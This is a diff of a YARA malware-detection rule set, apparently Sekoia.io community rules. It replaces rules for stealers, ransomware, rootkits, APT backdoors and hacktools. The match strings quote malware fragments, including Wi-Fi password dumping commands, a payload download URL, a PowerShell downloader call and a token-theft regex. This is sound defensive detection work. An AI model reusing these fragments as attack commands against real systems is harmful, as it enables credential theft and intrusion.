-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_enigma_stealer_module.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_rotrot_strings.yar#L1-L36"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "4d2fb518c9e23c5c70e70095ba3b63580cafc4b03f7e6dce2931c54895f13b2c"
-		logic_hash = "0a6615d65867a160e1c87fbcfe30090d44d7f5c25b3a904f8719be7b385b14bb"
+		logic_hash = "425168003d0f14d791e7f46bf47c18652a1f6b66b9329155d2bca72cf0d8126b"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$eni01 = "enigma.common" nocase ascii wide
-		$eni02 = "--ENIGMA STEALER--" wide
-		$str01 = "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')" wide
-		$str02 = "/C chcp 65001 && netsh wlan show profile | findstr All" wide
-		$str03 = "/C chcp 65001 && netsh wlan show networks mode=bssid" wide
-		$str04 = "[Open google maps]" wide
-		$str05 = "Stealerium.Target." ascii
-		$str06 = "--- ClipperBCH ---" wide
-		$str07 = "//setting[@name='Username']/value" wide
-		$str08 = "Stealer >> Failed recursive remove directory with passwords" wide
-		$str09 = "[a-zA-Z0-9]{24}\\.[a-zA-Z0-9]{6}\\.[a-zA-Z0-9_\\-]{27}|mfa\\.[a-zA-Z0-9_\\-]{84}" wide
-		$str10 = "^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$" wide
+		$s1 = "qsphsbnebub"
+		$s2 = "rtqitcofcvc"
+		$s3 = "surjudpgdwd"
+		$s4 = "tvskveqhexe"
+		$s5 = "uwtlwfrifyf"
+		$s6 = "vxumxgsjgzg"
+		$t1 = "MpbeMjcsbs"
+		$t2 = "NqcfNkdtct"
+		$t3 = "OrdgOleudu"
+		$t4 = "PsehPmfvev"
+		$t5 = "QtfiQngwfw"
+		$t6 = "RugjRohxgx"
+		$u1 = "UfsnjobufKpcPckfdu"
+		$u2 = "VgtokpcvgLqdQdlgev"
+		$u3 = "WhuplqdwhMreRemhfw"
+		$u4 = "XivqmrexiNsfSfnigx"
+		$u5 = "YjwrnsfyjOtgTgojhy"
+		$u6 = "ZkxsotgzkPuhUhpkiz"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $eni* ) and 4 of ( $str* )
+		uint16be( 0 ) == 0x4d5a and filesize > 100KB and filesize < 300KB and any of ( $s* ) and any of ( $t* ) and any of ( $u* )
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_3 : FILE
+rule SEKOIA_Infostealer_Win_Blackguard_Mar23 : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Finds BlackGuard samples based on specific strings (March 2023, version 5)"
 		author = "Sekoia.io"
-		id = "57b3ca9a-59c5-4b28-8eb9-36ff5b3633c2"
-		date = "2023-02-03"
+		id = "65804d31-2a0c-4b22-a8d9-8cbe1497f155"
+		date = "2023-03-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_3.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_blackguard_mar23.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ef62075c804080c0450f856b768da84a32f20e2f1ce5714e477b3e6f01d60503"
+		logic_hash = "63d77808036478da0c8d38a6d3581ccd2d4e46ae16ec9e817f09f8b633b01843"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -258352,143 +258458,148 @@ rule SEKOIA_Generic_Sharpshooter_Payload_3 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Function RC4(byteMessage, strKey)"
-		$ = "Sub Run()"
-		$ = "plain = RC4(decoded, "
-		$ = "Dim plain"
+		$str01 = "==================  5.0 ==============" wide
+		$str02 = "/concerts/disk.php" wide
+		$str03 = "/concerts/memory.php" wide
+		$str04 = "/loader_v2.txt" wide
+		$str05 = "io.solarwallet.app\\Local Storage\\leveldb" wide
+		$str06 = "costura.dotnetzip.dll.compressed" ascii wide
+		$str07 = "set_Laskakakaska" ascii
+		$str08 = "get_Yliana" ascii
+		$str09 = "set_Illeona" ascii
+		$str10 = "set_Gyttettfd" ascii
 
 	condition:
-		all of them and filesize < 2MB
+		uint16( 0 ) == 0x5A4D and 4 of them
 }
-rule SEKOIA_Trojan_Win_Bbtok_Lnk_Sep23 : FILE
+rule SEKOIA_Tool_Enum4Linux_Strings
 {
 	meta:
-		description = "Finds BBTok installation LNK file"
+		description = "Detects enum4linux based on strings"
 		author = "Sekoia.io"
-		id = "b1d5dae6-d92f-4a4a-ae90-528cdb3e9e4c"
-		date = "2023-09-26"
+		id = "6b3094fe-1292-4da3-a1ed-9e255be531da"
+		date = "2024-02-02"
 		modified = "2024-12-19"
-		reference = "https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_win_bbtok_lnk_sep23.yar#L1-L21"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_enum4linux_strings.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "32bf07e3740399105359b62d8a612dfa731b024e06c9104b71b496919b5efe9e"
-		logic_hash = "5783487585dde1314c485bdcf3942b7e8b572c0689522ea136240833d2a64f5b"
+		logic_hash = "d3f7ddbdfb679b34777298aec84464d55fac7600b855526a7f13d8c8f17ab888"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$lnk = {4C 00 00 00}
-		$str01 = "%ProgramFiles(x86)%\\Microsoft\\Edge\\Application\\msedge.exe" ascii wide
-		$str02 = ".pdf /Y & start" wide
-		$str03 = "\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe -nologo" wide
+		$ = "my $os_info = `$command`;"
+		$ = "($global_workgroup) = $os_info =~"
+		$ = "sub enum_groups {"
+		$ = "if ($shares =~ /NT_STATUS_ACCESS_DENIED/) {"
+		$ = "Can't open share list file $shares_file"
+		$ = "my $users = `$command`;"
+		$ = "my @shares = <SHARES>;"
+		$ = "foreach my $grouptype (\"builtin\", \"domain\") {"
 
 	condition:
-		all of them and filesize < 10KB
+		6 of them
 }
 
-rule SEKOIA_Ransomware_Lin_Avoslocker_Sections : FILE
+rule SEKOIA_Typhon_Reborn_Stealer
 {
 	meta:
-		description = "Detect AvosLocker ransomware for Linux by using its section hashes"
+		description = "Typhon Reborn v2 string based detection"
 		author = "Sekoia.io"
-		id = "3a7bf14d-24fb-47c9-b073-dd734f808983"
-		date = "2022-02-21"
+		id = "aab7279b-b651-4092-b988-d186d0a433de"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_lin_avoslocker_sections.yar#L4-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/typhon_reborn_stealer.yar#L3-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "67becae97ccfaf2e62c0329e23a91b1134c265bc83b1fc9091b170a1e04f34d4"
-		score = 40
+		logic_hash = "0db77a2e1d6b7274b0256fe469b72953c1b8598cbfc1715a43e5fbfa7899fe4c"
+		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "0cd7b6ea8857ce827180342a1c955e79c3336a6cf2000244e5cfd4279c5fc1b6"
-		hash2 = "7c935dcd672c4854495f41008120288e8e1c144089f1f06a23bd0a0f52a544b1"
-		hash3 = "10ab76cd6d6b50d26fde5fe54e8d80fceeb744de8dbafddff470939fac6a98c4"
+
+	strings:
+		$s1 = "api.telegram.org/bot" wide
+		$s2 = "TyphonReborn Stealer v2 log!" wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "91476dafa5ef669483350538fa6ec4cb" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "c2b21b2556c9d751e203965c825f8a81" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "f858d36231ba743ad8c898d86a67a864" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "7dea362b3fac8e00956a4952a3d4f474" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "489c87d7b1a694980587dfb413fb2afc" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "972e27e9f115278244f5e4ae89dd412a" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "d1f5b688a92b611e1363945fa552a9d7" )
+		all of them and pe.is_pe
 }
-rule SEKOIA_Gen_Empire_Onedrive_Stager
+rule SEKOIA_Tool_Sharphoundpowershell_Strings : FILE
 {
 	meta:
-		description = "Detects the Empire OneDrive stager"
+		description = "Detects SharpHound Powershell"
 		author = "Sekoia.io"
-		id = "2053416f-1f53-491e-9c70-787a04362d16"
-		date = "2022-01-26"
+		id = "f27a0bdc-1a8c-43f9-843c-6c8506726f37"
+		date = "2022-08-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/gen_empire_onedrive_stager.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_sharphoundpowershell_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "90b3548cd3f4f7f936da70ec95dbe0ff3c1421d40a6e8557952d28d358b7c1f1"
+		logic_hash = "29756acb0afd8aabac170ca8288f1dcffcb2e601c9bdba1cc7a30b8b415661f6"
 		score = 75
-		quality = 76
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$sleep = "Start-Sleep -Seconds $(($PI -as [Int])*2)" wide ascii nocase
-		$down = "wc.DownloadData" wide ascii nocase
+		$ = "function Invoke-BloodHound"
+		$ = "$vars.Add($RealDNSName)"
+		$ = "$vars.Add($Jitter)"
+		$ = "CmdletBinding(PositionalBinding = $false)"
+		$ = ").Invoke($Null, @(,$passed))"
+		$ = "$EncodedCompressedFile ="
 
 	condition:
-		$down in ( @sleep .. @sleep + 1000 )
+		filesize < 2MB and 4 of them
 }
-
-rule SEKOIA_Implant_Win_Graphiron_Downloader : FILE
+rule SEKOIA_Botnet_Lin_Tsunami : FILE
 {
 	meta:
-		description = "Detect the downloader of Graphiron"
+		description = "Catch tsunami botnet based on string"
 		author = "Sekoia.io"
-		id = "c50c4bd2-3828-43bf-b45c-8e911c298536"
-		date = "2023-02-10"
+		id = "65d2ff89-064f-489a-a215-33197926a62d"
+		date = "2024-09-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_graphiron_downloader.yar#L4-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/botnet_lin_tsunami.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f0aa0541cbf3f93ee136cf3235a4935f1c0588b5cdb21203abee9f61baf3f4f2"
+		hash = "536a28db011459d841652e25a852ccf2"
+		logic_hash = "8678ead4c863b2bc6bbb5e0023dee10f4e9f031bd0c8f515ad30d6145755ccaa"
 		score = 75
-		quality = 80
+		quality = 53
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "0d0a675516f1ff9247f74df31e90f06b0fea160953e5e3bada5d1c8304cfbe63"
-		hash2 = "878450da2e44f5c89ce1af91479b9a9491fe45211fee312354dfe69e967622db"
+
+	strings:
+		$n = "NOTICE %s" ascii
+		$t = "TSUNAMI" ascii nocase
+		$s1 = "NICK" ascii fullword
+		$s2 = "GETSPOOFS" ascii fullword
+		$s3 = "IRC" ascii fullword
+		$s4 = "PONG" ascii
 
 	condition:
-		for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1b614f8d813125f56d2e772ed0ca5dae" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5c6496d33de5a35bd38ddb12d8b42e03" ) and filesize > 3MB and filesize < 6MB
+		uint32( 0 ) == 0x464c457f and #n > 40 and #t > 3 and 3 of ( $s* )
 }
-rule SEKOIA_Rootkit_Diamorphine_Strings : FILE
+rule SEKOIA_Apt_Mustangpanda_Tinynote : FILE
 {
 	meta:
-		description = "Detects Diamorphine linux rootkit based on strings"
+		description = "Detects strings in TinyNote backdoor"
 		author = "Sekoia.io"
-		id = "5a28be5c-9a57-4204-a7cc-42dfcaa2c2da"
-		date = "2024-10-21"
+		id = "a2b9bea4-a211-456f-8a3f-0f31733e8b29"
+		date = "2023-06-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rootkit_diamorphine_strings.yar#L1-L31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_tinynote.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "622675e83bab630adc0f1c6c46c4d6d1"
-		hash = "013b23213975d2646e2435f058afcacf"
-		hash = "f068e83721f10ad74bb6f386a4375a91"
-		hash = "ba9d6a6bbde602fd414cea09fcbd1aa0"
-		hash = "fdd86788e295010c4e61bf6b589f340e"
-		hash = "0d396c1763503b35a7f601831bd684de"
-		hash = "66b8955188a3bda7ecdcd51cfd360313"
-		hash = "1e4fd8c6bf0e381ac395d9bff1f98a31"
-		hash = "ce08ce2b8bc1718052f5d0316e3e71b7"
-		hash = "94982037875d4fdb17681866afc12ade"
-		hash = "4fa2fe9ccde3e6bd4956e2b93ca5fcb6"
-		hash = "644c4ce0bbe4f1f1e3aae537a111d5b8"
-		hash = "fb7d594621fbb4f9bdb0eb74f6090ecd"
-		hash = "9faf1493164e734f533f0ecfb1737a98"
-		hash = "33d48b6c66715ab67a059ab940d759ff"
-		logic_hash = "70e2e9155181a717f1c2483a748d5991488f0ba7371a2b3c9cfada2ecc5812f9"
+		logic_hash = "20723b449d057ddf09fa34aa7511275939f98c6c84593af64d99f980c679b2c1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -258496,86 +258607,97 @@ rule SEKOIA_Rootkit_Diamorphine_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "LKM rootkit" ascii fullword
-		$ = "m0nad"
+		$s1 = "bypassSMADAV" ascii fullword
+		$s2 = "excuteCmdLine" ascii fullword
+		$s3 = "/Create1953125" ascii
+		$s4 = "MINUTEMonday" ascii
+		$s5 = "WndProc" ascii
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
 }
-rule SEKOIA_Storm_1811_Screenconnect_Update
+rule SEKOIA_Apt_Apt41_Javascript_Dropper : FILE
 {
 	meta:
-		description = "Detects files used in a campaign performed by the intrusion set Storm-1811"
+		description = "Detects Earth Lusca JS dropper"
 		author = "Sekoia.io"
-		id = "252ef24a-14dc-41e8-ba91-dcb9b6deb428"
-		date = "2024-06-11"
+		id = "fde70806-af50-4706-9daf-d39ad0564fc7"
+		date = "2024-02-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/storm_1811_screenconnect_update.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt41_javascript_dropper.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ad61e28566375fd3c029df79e1b608aac921ab8121a43bd01314c9112197c32e"
+		logic_hash = "3e34af7141e41044c3d3e099e8b8deafc7441ea47ccbd8af7ffe686f10bb18a2"
 		score = 75
-		quality = 55
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "upd100.appspot.com/update/u.zip" ascii fullword
-		$s2 = "Unzip ok" ascii fullword
-		$s3 = "Installing update" ascii fullword
-		$s4 = "Administrators" ascii fullword
-		$s5 = "I am not admin" ascii fullword
-		$s6 = "I am admin" ascii fullword
-		$s7 = "ScreenConnect.ClientSetup.exe" ascii fullword
-		$s8 = "for %%x in (%IPS%) do (" ascii fullword
+		$s1 = "eval(function(p, a, c, k, e, r) {"
+		$s2 = "|4d53"
+		$s3 = "ActiveXObject"
+		$x1 = " -F:* %1%"
+		$x2 = "&I /r c:\\"
+		$x3 = "ActiveXObject"
 
 	condition:
-		6 of them
+		filesize < 2MB and ( all of ( $s* ) or all of ( $x* ) )
 }
-
-rule SEKOIA_Backoor_Win_Tinyturla_Ng : FILE
+rule SEKOIA_Implant_Macos_Geacon : FILE
 {
 	meta:
-		description = "Detect the TinyTurla-NG backdoor used by Turla"
+		description = "Finds Geacon samples based on specific strings"
 		author = "Sekoia.io"
-		id = "019043bb-0212-4b73-bc93-03e9a746d28d"
-		date = "2024-03-04"
+		id = "a7784bfa-66a7-47df-b88b-d98217d8cca5"
+		date = "2024-01-11"
 		modified = "2024-12-19"
-		reference = "https://blog.talosintelligence.com/tinyturla-next-generation/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backoor_win_tinyturla_ng.yar#L3-L28"
+		reference = "https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_macos_geacon.yar#L1-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a2fe2187e0cdd02fa31cbbecd600d044d4d12788ea6f76086aef7e77cbf232a0"
+		logic_hash = "284574d185d3777a373f4a19e0870eec5245fb8ea5ebd6124bc281f8c74e0998"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b"
-		hash2 = "d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40"
 
 	strings:
-		$ = "delkill /F /IM explENT_USER\\Softwar"
-		$ = "Set-PSReadLineOption -HistorySaveStyle SaveNothing"
-		$ = "changeshell"
-		$ = "chcp 437 > $null"
-		$ = "powershell.exe -nologo"
+		$gea01 = "geacon/config.init" ascii
+		$gea02 = "geacon_pro-master/config/config.go" ascii
+		$gea03 = "geacon_plus-main/config/config.go" ascii
+		$gea04 = "command type %d is not support by geacon now" ascii
+		$gea05 = "main/sysinfo.GeaconID" ascii
+		$str01 = "command.StealToken" ascii
+		$str02 = "command.MakeToken" ascii
+		$str03 = "command/misc.go" ascii
+		$str04 = "config/c2profile.go" ascii
+		$str05 = "crypt.AesCBCDecrypt" ascii
+		$str06 = "packet.File_Browse" ascii
+		$str07 = "packet.FirstBlood" ascii
+		$str08 = "packet.ParseCommandShell" ascii
+		$str09 = "packet.ParseCommandUpload" ascii
+		$str10 = "packet.PushResult" ascii
+		$str11 = "sysinfo.GetComputerName" ascii
+		$str12 = "sysinfo.IsOSX64" ascii
+		$str13 = "util..inittask" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them or pe.imphash ( ) == "2240ae6f0dcbc0537836dfd9205a1f2b"
+		uint32( 0 ) == 0xFEEDFACF and ( ( 1 of ( $gea* ) and 2 of ( $str* ) ) or 8 of ( $str* ) )
 }
-rule SEKOIA_Ransomware_Win_Voidcrypt : FILE
+rule SEKOIA_Apt_Gamaredon_Gammaload_Malicioushta : FILE
 {
 	meta:
-		description = "Detect the Limbozar / VoidCrypt ransomware"
+		description = "Detects Gamaredon's GammaLoad HTA"
 		author = "Sekoia.io"
-		id = "394033cc-20fe-4ced-8d77-5f1061bb8c96"
-		date = "2021-10-07"
+		id = "e5e502db-7f37-40f2-9ba3-81e158e767db"
+		date = "2022-08-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_voidcrypt.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_gammaload_malicioushta.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "7e28bae5830df779bf2367482fb966f5cab691a6c8c474950f7442d8fec054a0"
+		logic_hash = "e41ce63e7c6df2edb548ddc57d51af914dab9200e37eb12463169d587205aa7a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -258583,25 +258705,27 @@ rule SEKOIA_Ransomware_Win_Voidcrypt : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "C:\\ProgramData\\pkey.txt" ascii
-		$s2 = "C:\\ProgramData\\IDk.txt" ascii
-		$s3 = "fuckyoufuckyoufuckyoufuckyou" ascii
+		$s1 = "platform = window.navigator?.userAgentData?.platform" ascii fullword
+		$s2 = "'Win32', 'Win64', 'Windows', 'WinCE'" ascii
+		$s3 = "dcreate.download ="
+		$s4 = "dcreate.href = 'data:application/x-rar-compressed;base64"
+		$s5 = "= \"UmFyI"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint32be( 0 ) == 0x3c68746d and filesize < 400KB and filesize > 50KB and 4 of them
 }
-rule SEKOIA_Trojan_Win_Grandoreiro : FILE
+rule SEKOIA_Apt_Oilrig_Oilbooster_Strings : FILE
 {
 	meta:
-		description = "Finds Grandorerio samples based on the specific strings"
+		description = "Detects OilBooster malware based on strings"
 		author = "Sekoia.io"
-		id = "e48c86a1-e34f-4945-817a-9c85198a77bb"
-		date = "2022-08-24"
+		id = "001d12bc-1e7e-4a6c-9172-66687d08d827"
+		date = "2023-12-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_win_grandoreiro.yar#L1-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_oilbooster_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "7424478b0cdfe922c2f98bf42e505f22fb0700cfeb54912630ce404c59b05c5e"
+		logic_hash = "9562d373ba7602d250aec1eefa2d671da64e897e490da284ffa0e310074266cf"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -258609,32 +258733,26 @@ rule SEKOIA_Trojan_Win_Grandoreiro : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$mut = "ZTP@11" wide
-		$reg01 = "Software\\Embarcadero\\Locales" wide
-		$reg02 = "Software\\CodeGear\\Locales" wide
-		$reg03 = "Software\\Borland\\Locales" wide
-		$reg04 = "Software\\Borland\\Delphi\\Locale" wide
-		$reg05 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" wide
-		$str01 = "SELECT * FROM AntiVirusProduct" wide
-		$str02 = "GetTickCount64" wide
-		$str03 = "C:\\Program Files (x86)\\Embarcadero\\Studio\\20.0\\lib\\Clever Internet Suite" wide
-		$str04 = "{43826D1E-E718-42EE-BC55-A1E261C37BFE}" wide
+		$ = "/rt.ovf" wide ascii
+		$ = "User-Agent: " wide ascii
+		$ = "/me/drive/items" wide ascii
+		$ = "client_secret" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 5MB and all of them
 }
-rule SEKOIA_Hacktool_Iox_Tunneling : FILE
+rule SEKOIA_Apt_Uac0154_Malicious_Html_Smuggling : FILE
 {
 	meta:
-		description = "Detects IOX tunneling tool"
+		description = "UAC-0154 Infection chain"
 		author = "Sekoia.io"
-		id = "45b31d67-95e9-405d-88ea-3f2006ef160a"
-		date = "2022-10-13"
+		id = "923d11e5-6332-456d-8aff-ae7fb76193a8"
+		date = "2023-10-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_iox_tunneling.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_uac0154_malicious_html_smuggling.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e15df032864799e282ee89402d22b82e5d4b8f469ec292575a1bcb78d24db012"
+		logic_hash = "ba37b076ac29edcb9af7792420b527b0d64e7838e0237b39afe98a817eafdf7e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -258642,82 +258760,61 @@ rule SEKOIA_Hacktool_Iox_Tunneling : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "iox/operate.Local2Remote"
-		$ = "iox/operate.Local2Local"
-		$ = "iox/operate.Remote2Remote"
-		$ = "iox/operate.ProxyLocal"
-		$ = "iox/operate.ProxyRemote"
-		$ = "iox/operate.ProxyRemoteL2L"
+		$ = "Microsoft&reg; HTML Help Workshop 4.1"
+		$ = "var a=['"
+		$ = ")+b('0x"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 5MB and all of them
+		all of them and filesize < 100KB
 }
-rule SEKOIA_Apt_Icepeony_Icecache : FILE
+
+rule SEKOIA_Backdoor_Win_Ketrum2
 {
 	meta:
-		description = "Detects IceCache backdoor"
+		description = "Detect Ke3chang's Ketrum backdoor version 2"
 		author = "Sekoia.io"
-		id = "3135c70e-c925-4d26-beed-09424fc0c153"
-		date = "2024-10-21"
+		id = "afcc349a-d44b-4b66-b86f-c62e700fa899"
+		date = "2022-10-19"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_icepeony_icecache.yar#L1-L46"
+		reference = "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_ketrum2.yar#L4-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "38708c33dafb5625ddde1030a7efa7db"
-		hash = "1e102c8909b2bf71c626b81f7526ee01"
-		hash = "34bc3c586a48f836b00aff59fe891b30"
-		hash = "cd906f4cef84dddeb644b06777474b2e"
